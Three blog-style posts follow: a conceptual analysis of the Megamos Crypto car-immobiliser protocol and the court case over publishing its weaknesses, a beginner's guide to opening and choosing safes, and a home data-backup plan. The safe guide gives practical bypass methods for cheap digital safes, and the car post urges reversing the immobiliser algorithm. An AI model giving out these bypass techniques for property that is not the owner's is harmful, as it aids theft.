In detail the way this works is as follows: both the car computer and the transponder know a secret number. The number is unique to that car. It is called the “secret key”. Both the car computer and the transponder also know a secret algorithm. That is a complex mathematical formula. Given two numbers it will produce a third number. The algorithm is the same for all cars which use the Megamos Crypto chip. Carrying out that calculation is what the Megamos Crypto chip does.

When the process starts the car generates a random number. It is sent to the transponder. Now both computers perform the complex mathematical operation using two numbers they both should know, the random number and the secret key. They each produce a third number. The number is split into two parts called F and G. Both computers now know F and G. The car sends its F to the transponder. The transponder can check that the car has correctly calculated F. That proves to the transponder that the car knows both the secret key and the Megamos Crypto algorithm. The transponder can now be satisfied that the car is genuinely the car it is supposed to be. If the transponder is happy, the transponder sends G to the car. The car checks that G is correct. If it is correct then the car is happy that the transponder also knows the secret key and the Megamos Crypto algorithm. Thus the car can be satisfied that the transponder is genuine. So both devices have confirmed the identity of the other without actually revealing the secret key or the secret algorithm. The car can safely start. The verification of identity in this process depends on the shared secret knowledge. For the process to be secure, both pieces of information need to remain secret – the key and the algorithm.

In standard cryptography terminology:

A car \text{C} and a transponder \text{T} share a secret key K. A pseudo-random function family \textsf{PRF} is keyed using key K i.e. \textsf{PRF}_K. The output from this PRF is split into two parts F and G.

  1. \text{C} generates a random number r.
  2. \text{C} calculates (F,G) = \textsf{PRF}_K(r)
  3. \text{C} \to \text{T}: r, F
  4. \text{T} calculates (F',G') = \textsf{PRF}_K(r)
  5. \text{T} checks that F = F'
  6. \text{T} \to \text{C}: r, G
  7. \text{C} checks that G = G'

This process means that the transponder believes the car knows the key and PRF, and the car believes the transponder knows the key and PRF. They should have authenticated themselves with each other.

What is a PRF? A pseudo-random function is similar in many respects to a psuedo-random number generator (PRNG), except instead of sequentially generating output, you can randomly access any of the outputs using an index (r in the example above). The key is analogous to the seed of the PRNG. Using a certain key, a given input will map to a determined output.

Importantly, the output of a PRF should be indistinguisable to an observer from a random function, and by extension you should not be able to derive the key even if inputs, outputs, or free access to the function is given. You should also not be able to tell which PRF is in use even if you can control the inputs and read the outputs.

So – if this is a secure, solid, verified PRF, the protocol should be secure, even if we know what the PRF is. The only thing that needs to be kept secret is the key.

But the court decision says:

The verification of identity in this process depends on the shared secret knowledge. For the process to be secure, both pieces of information need to remain secret – the key and the algorithm.

This suggests a few things:

  1. The PRF used is not secure
  2. They don’t know what they are talking about

Both are entirely possible, but I would strongly suspect that the PRF has issues and they want to keep it secret. This would be a clear example of “security through obscurity”.

How could a PRF be insecure?

  • Using one or more input/output pairs, it might be possible to derive the key.
  • You might not need a key to derive the output given the input.
  • The key length might not be long enough to prevent bruteforcing.
  • F and G might not depend on the whole key i.e. you might be able to calculate G given part of the key.

The protocol itself might suffer from further issues:

  • There does not appear to be any protection from replay attacks (prevented from being used as a direct vulnerability because the authentication is bidirectional).
  • Is the random nummber actually random? Does it matter if it isn’t? If they are re-used (i.e. it’s not a nonce), it probably does matter.
  • The transponder can bypass the check for F = F’ – it can be a “yes” key. If we don’t need the entire key to compute G, this matters.
  • The key might be constant across an entire line or make of cars. Recover the key from one transponder and there would be no secrets left.
  • The key might be derived from an open piece of information like the car VIN number
  • The key might be derived from something like the manufacture date/time of the car, massively reducing keyspace
  • Probably a million more things

Let’s look at the attacks described in the court decision.

Firstly, note:

The attacks are not, themselves, trivial things to do. However, they allow someone, especially a sophisticated criminal gang with the right tools, to break the security and steal a car.

This makes it sound like some of these attacks are practical i.e. it won’t take 2 weeks of effort after decapping and reading the key from EEPROM.

Attack 1:

One attack relies on weaknesses in the secret keys that are used in certain cars. That “weak key” weakness arises because certain car makers have used weak secret keys which are easier to guess than they need to be. In effect, it is a bit like using the word “password” for a password.

As I mentioned above, there are a number of situations where the keys chosen might be poor. It might be the case that the researchers need 2 weeks to work out the key given a car and transponder, but then if the same key is used across all cars, it doesn’t really matter.

Attack 2:

Another is concerned with key updates. The details do not matter.

This is very vague.  Maybe you can alter or add keys easily if you already have access to the car?

Attack 3:

The third attack relates to weaknesses in the Megamos Crypto algorithm itself. The academics explain this attack in the paper, and, as I say, the paper also sets out the whole of the algorithm. It is these two elements that the claimants seek to prevent publication of. The claimants wish to remove the Megamos Crypto algorithm and information about the attack based on the weakness in it from the paper.

This is where we get to the point that it sounds like the PRF is not secure. It sounds like this attack may take days of work with access to both the car and transponder.

This could be like the insecurities found in Keeloq. The first step was determining the details of the algorithm. The first few papers detailed weaknesses that meant the protocol was insecure, but the weakness could not practically be exploited. After this, papers were released that detailed faster, more effective attacks, until finally we are at the stage where Keeloq can be called “broken”.

A quick look at some of the software

I haven’t got hold of Tango Programmer, but I do have RwProg up and running. Here is a screenshot:2013-08-07 22_37_06-RwProg   v2.17.0002

What can we tell from this? Well, the crypto key looks to be 96bits long – too long to bruteforce.

There are a few videos as well:

http://www.youtube.com/watch?v=SKTMawm5Ffw

http://www.youtube.com/watch?v=EX4FuK1JUEE

Nothing really groundbreaking. I can’t see how the software reads and then writes the crypto key.

Conclusion

Regardless of the court decision, it looks like there is enough information out there for other people to start work on this. Download the software, maybe buy Tango Programmer, reverse the algorithm and then let the world loose on it!

 

A newbie’s guide to safes, both opening and using

Firstly, a disclaimer – I’m not a safe cracker. I just know quite a few people who do work on safes and probably know more than the average person.

On Reddit a few months ago, a post appeared from user dont_stop_me_smee showing pictures of a large vault in a friend’s rented property. This garnered a lot of attention, partly riding off the back of the much older “vault in disused casino” popularity. Needless to say, OP did not deliver, and the vault is still closed.

As a result of this post, a new subreddit was set up called “WhatsInThisThing“:

This subreddit is a place for anyone who has acquired a safe, piggy bank, briefcase, treasure chest, oak barrel, thumb drive, bottle, locker, storage unit, abandoned home, bomb shelter, antique can, maybe even a confidential file to post pictures of the adventure of finding out what’s inside it.

There have been a lot of safes posted since then, ranging from modern £20 B&Q specials up to vintage monsters.

There has also been a lot of crap posted about safes and how to open them.

I’m writing this post to try and clear up some aspects of safes, both in terms of opening them an using them to improve your own security.

First things first, if you want your safe opened quickly and without damage, call a good safe engineer. If you are in the UK or Europe, I can put you in touch with someone.

Otherwise, read on.

Opening cheap modern safes

There are a lot of cheap modern safes, constructed of sheet steel (or even plastic/cement laminate!), often with digital combination locks or very insecure mechanical locks. These only provide an illusion of security.

How would I open a cheap digital combination lock safe?

  • Find the manual. The safe will have a default code, and could have a reset procedure that can be triggered from outside the safe. Try this first.
  • Call the manufacturer. Some of these safes have reset procedures that you can get from the manufacturer. You will need to prove ownership. Sometimes you need the serial number which will be inside the safe.
  • Try hitting it. A lot of these safes hold the boltwork back using a spring loaded solenoid. If you hit the safe in the right place with a mallet (or even your hand on smaller safes) whilst turning the handle, it bounces the solenoid back enough to allow the safe to open. This works on a surprisingly large number of safes.
  • Pick the override lock. Nearly all of these safes have a mechanical override lock. These are normally cheap wafer locks, which can be picked open easily by locksmiths and hobbyists.
  • Try and activate the code reset button. Many safes have a small button inside the door used to change the combination. I’ve managed to press this button from outside the safe by using a welding rod poked through a mounting hole on the rear of the safe.
  • Take the front panel off and manually activate the solenoid or motor. Some of the cheap safes have all of the electronics outside of the safe. If you remove the front panel, you will often find two wires going through the door. These connect to the solenoid or motor inside the safe. Apply the correct voltage (usually the same as the total voltage of the batteries) and the safe will unlock.
  • Cut the safe open. I’ve not seen one of these resist more than a few minutes with even a small angle grinder. The top or back is normally easiest.

Most of the time, you don’t really care if the safe survives or not, so go to town on it.

Opening bigger and better safes

If you want to try it yourself, you have the following options…

Non-destructively open the lock. There are a number of techniques that can be used to open mechanical combination locks – reading contact points, or brute forcing (trying every combination using a motor). This is a very skilled job. It is also unwise if you don’t know if the lock works or not – hours could be spent trying to open a lock that will never unlock. Matt Blaze has written a great guide on this (and other vulnerabilities) called “Safe Cracking For the Computer Scientist“. If the lock is mechanical, it can be picked.

Drill the safe. If non-destructive entry is not possible, safe engineers will drill the safe. This involves making a small penetration somewhere on the safe and then opening the safe through the hole. Again, this is a skilled job. You need to know exactly where to drill and then how to open the safe. Sometimes you will drill near to the combination lock and use a borescope to read the wheel pack. Sometimes you will drill to access the bolt or fence instead. Many safes have very hard steel called “hardplate” protecting the lock, and this requires a lot of pressure and special drill bits to get through. Most safes have some form of “relocker” – additional spring-loaded bolts that will trigger under attack and hold the boltwork shut. You really don’t want to trigger these as there is no way to unlock them from outside the safe. The small hole that is left can be filled with hardened steel and welded over for repair.

Cut the safe open. This still generally requires skill or knowledge if you don’t want to damage the contents. Angle grinders, punches, concrete breakers, and thermal lances are tools used here. This can be very time consuming and noisy.

Do you see a theme? You generally need to know what you are doing.

Opening a vault

Unless you can make a hole in the wall, floor, or ceiling, you should call a safe engineer.

Old safes vs. new

Most older safes tend to be fairly secure. I believe this is because of two things. Firstly, safes used to be made better, or at least, more solidly.  Secondly, if an old safe has survived this long and not been opened, it’s either secure or too damn heavy to throw out.

A lot of modern safes are cheap crap. Anything you can buy in B&Q can be cut open in under 10 minutes. But a good, expensive modern safe is a formidable opponent. Modern combination locks are very good – they have extensive “anti manipulation” features. Even low-cost lever locks are hard to pick. Hardplate is very hard and there are advanced composite materials that are difficult to drill or cut through.

What not to do

There is a lot of bad advice floating about.

Don’t cut the external hinges off the door. They aren’t part of the locking mechanism on even the cheapest safes, so you now have a broken safe that is still closed.

Don’t force the handle. Good safes have boltwork that won’t open no matter how much force you apply to the handle. The handle will shear off first or you will break part of the drive mechanism.

Don’t hit the dial or spindle of the combination lock. The combination lock and door has something called a relocker on it. If you trigger this by hitting it, additional spring-loaded bolts will fire and mean that you cannot open the safe even if you unlock the lock. You’ve potentially made an easy job much harder.

Don’t attempt to use thermite. I’m not sure why, but people suggest this. I suspect none of them have made or used thermite. I have. It’s hard to mix correctly, it isn’t cheap, it’s dangerous, and it will destroy the contents of the safe.

Don’t try a plasma cutter. Again, I suspect these people have never used a plasma cutter. They are exceptionally good at cutting through plate. They are no good when you cannot make the cut in one pass (there is nowhere for the slag to go, so it gets blasted back towards you). They will toast the contents. They are expensive and need a lot of compressed air.

Don’t try any other half-cut idea from someone who has no idea what they are doing. Dousing the safe in liquid nitrogen, filling with water and blowing it up etc. all sound like they are a lot more work and cost than just paying a safe engineer.

Don’t think that opening safes is some kind of mystical black art. There are hundreds of people who can open safes. The more expensive and secure the safe, the less there are that can open it. But there is no safe that cannot be opened.

Don’t think that the safe will have anything exciting in it. They very rarely do.

What do you need in a safe?

After reading all of that, you’ve decided you need a safe. What should you look for?

  • Consider the difference between a key and combination. A combination can be trivially copied, but is easily shared. A key is harder to copy but useless if left near the safe. Which works better for your users?
  • Avoid any digital combination safe that has a mechanical override lock. Instead of having one good mechanical lock, you now have a digital lock and a crap mechanical lock. The security of the safe is limited by the lower of the two.
  • Look for a good lever lock. At prices acceptable to most householders, a good lever lock will provide the best security.
  • Decide if you are protecting against fire and/or theft. A lot of “fire safes” have extremely poor security. Burglary is far more common than house fire. My safe protects against theft, and the small fire chest inside protects truly irreplaceable objects.
  • Avoid any safe that a single person can easily pick up. You don’t need something that weighs 750kg, but 50kg+ makes things a lot more awkward for burglars.
  • Make sure you can bolt the safe to the floor and/or wall. A 50kg safe attached to a concrete floor with 4 expanding bolts is going to be as hard to move as a 500kg safe.
  • Make sure it is big enough to hold your stuff. If it can’t hold the thing you need to protect, it has no purpose. A lot of smaller safes can’t take 15.6″ laptops.
  • Make sure it is accessible enough that you actually use it. If it is hidden away, you are unlikely to ever use it. If your stuff isn’t in the safe, it doesn’t matter how secure the safe is.

Recommended contacts

The following locksmiths and safe engineers are known to me, and whilst I have never had to use their services, I know they do good work.

Jason Jones at Kelocks (UK)

Stuart Game at BBS Safe Engineers (UK)

Nigel Tolley at Discreet Security Solutions (UK)

Jord Knapp at Knapp Junior (NL)

Emiel van Kessel at De Slotenspecialist (NL)

Oliver Diederichsen at Tresoroeffnung (DE)

Don’t lose your data…

A bit of a different subject to normal posts. I’ve seen a lot of tweets recently from people who have lost irreplaceable data because they haven’t got a backup or their backups weren’t working properly.

Bruce Schneier recently said on his blog:

Remember the rule: no one ever wants backups, but everyone always wants restores.

This is the truth – it isn’t the backup that matters, it is the restore. You need to test it. If you are serious about your data, back it up!

I had a scare last year when my laptop’s SSD failed without warning, and then I found out my backups hadn’t been working properly. Luckily my elite data recovery skills meant I could get the data back.

I took this as a chance to implement a robust, dependable backup system that I knew I could rely on.

Goals

You need to decide what you are protecting

  • Photos – these to me are genuinely irreplaceable.
  • Projects – code, notes, datasheets, data etc. I could redo these, but it would take time and effort.
  • Emails – again, I would have no way of recreating these

And what you aren’t:

  • Media – TV, films, music. I’m not bothered about these – I can get them again
  • Programs and OS – I can download these again.

At this point I should say that I am not a fan of “bare metal restore” or full disk imaging. Why?

  • Individual files are not easily accessible – it is far harder to determine if things are working correctly.
  • The file formats are often proprietary and undocumented – if it isn’t working, I am going to have a hard time fixing that.
  • Bare metal restores are difficult onto different hardware – they don’t handle changes well, even a different sized partition complicates this.
  • I would hope I need to restore infrequently enough that re-installing my OS and programs is a welcome clean-out rather than inconvenience.

You need to decide what you are protecting against:

  • Disk failure – this seems to be the biggest threat to my data. One external HD and two mSATA SSDs have failed in the past two years. My view is now that no single storage device can be trusted, especially SSDs
  • Theft – my laptop, iPad, server or backup drives could be stolen.
  • Idiocy and mistakes – I could delete something I didn’t mean to at any point in time. Or simply change something I didn’t mean to.

It would be fair to say, my solution is belt and braces and then some.

Central storage

Instead of trusting my data to my individual mobile devices and backing those up, the primary store of data is on a central server located in our house.

This is a HP N40L server (which are often available for £100 with a cashback offer), running with 2x3TB drives in a RAID1 configuration. RAID1 is otherwise known as “mirroring” and I have implemented it in software (which means that I can put the drives in any machine, unlike with hardware RAID where the chipset must be the same). All RAID1 does is protect against drive failure – nothing else. If the machine is stolen, I lose my data. If I delete my data, I lose my data. Don’t fall into the trap that many do and call RAID1 a backup. I have done it for convenience and because these large drives are currently unproven in terms of reliability.

Although this is the primary store of data, I need to be able to work with this data quickly and when away from the house. Therefore everything is synced between the server and mobile devices periodically.

For Windows machines, I use SyncBack Pro to do this in near-realtime. It’s very effective and bi-directional.

Central storage backup

I run two of my own backups on the central storage.

Firstly, on a daily basis, an incremental backup is performed between the 2x3TB RAID1 array and an external 4TB USB drive. The incremental backup means I have 90 days of history on all of my files available immediately. The external USB drive means that there is a degree of isolation between the server and drive, and I can quickly remove it from the house if need be.

Secondly, at the beginning of each month, I plug in a second external 4TB USB drive. Again, this is an incremental backup, but less frequent. I then remove the drive and store it in my substantial safe. This protects me against hardware failure – even if the server decides to send 240V into all connected devices, this drive is not connected to the machine all of the time. It also protects me from theft and fire to a degree – only a determined burglar could open the safe.

Both of these use SyncBack Pro as well.

Offsite central storage backup

The entire central server is then backed up to the cloud using Crashplan. The most important feature of Crashplan is that it is offsite. Whatever happens to the hardware in the house, Crashplan will have the data.

Crashplan also allows friends and families to backup to my server and take advantage of all the other backups I perform.

Once a year I backup photos to a portable USB hard drive and give this to a trusted third party (parents) to look after.

Offsite laptop backup

Not content with that, I run Backblaze on my personal laptop. Backblaze is a competitor to Crashplan. This backs up everything on the laptop to the cloud.

(I’m not actually quite this paranoid – I used to use Backblaze on our old “server” running Windows 7. When I upgraded to the HP N40L, I found Backblaze doesn’t run on Windows server OS, so had to switch to Crashplan. I have another 18 months of Backblaze subscription left to use).

Dropbox and Github

The final aspect of backup is for all of my project work. All of it is on Dropbox. This isn’t primarily for backup – it is for access from wherever I want. All of my code goes onto Github.

Encryption

A number of the devices mentioned above are encrypted using Truecrypt. A number of more sensitive documents are encrypted before being sent to the cloud.

Testing

I regularly check the above is all working. I recently had an SSD failure, and initially noticed that 1 of the above mechanisms wasn’t working. It was quickly fixed.

Conclusion

This might be paranoid, but all this data is vital to me.

My photos, at the moment are stored:

  1. On my laptop
  2. On the RAID array in the server
  3. On the permanently connected USB drive
  4. On the once-a-month USB drive
  5. On the offsite portable USB drive
  6. On Crashplan
  7. On Backblaze

The chance of all of this going wrong at the same time is virtually zero.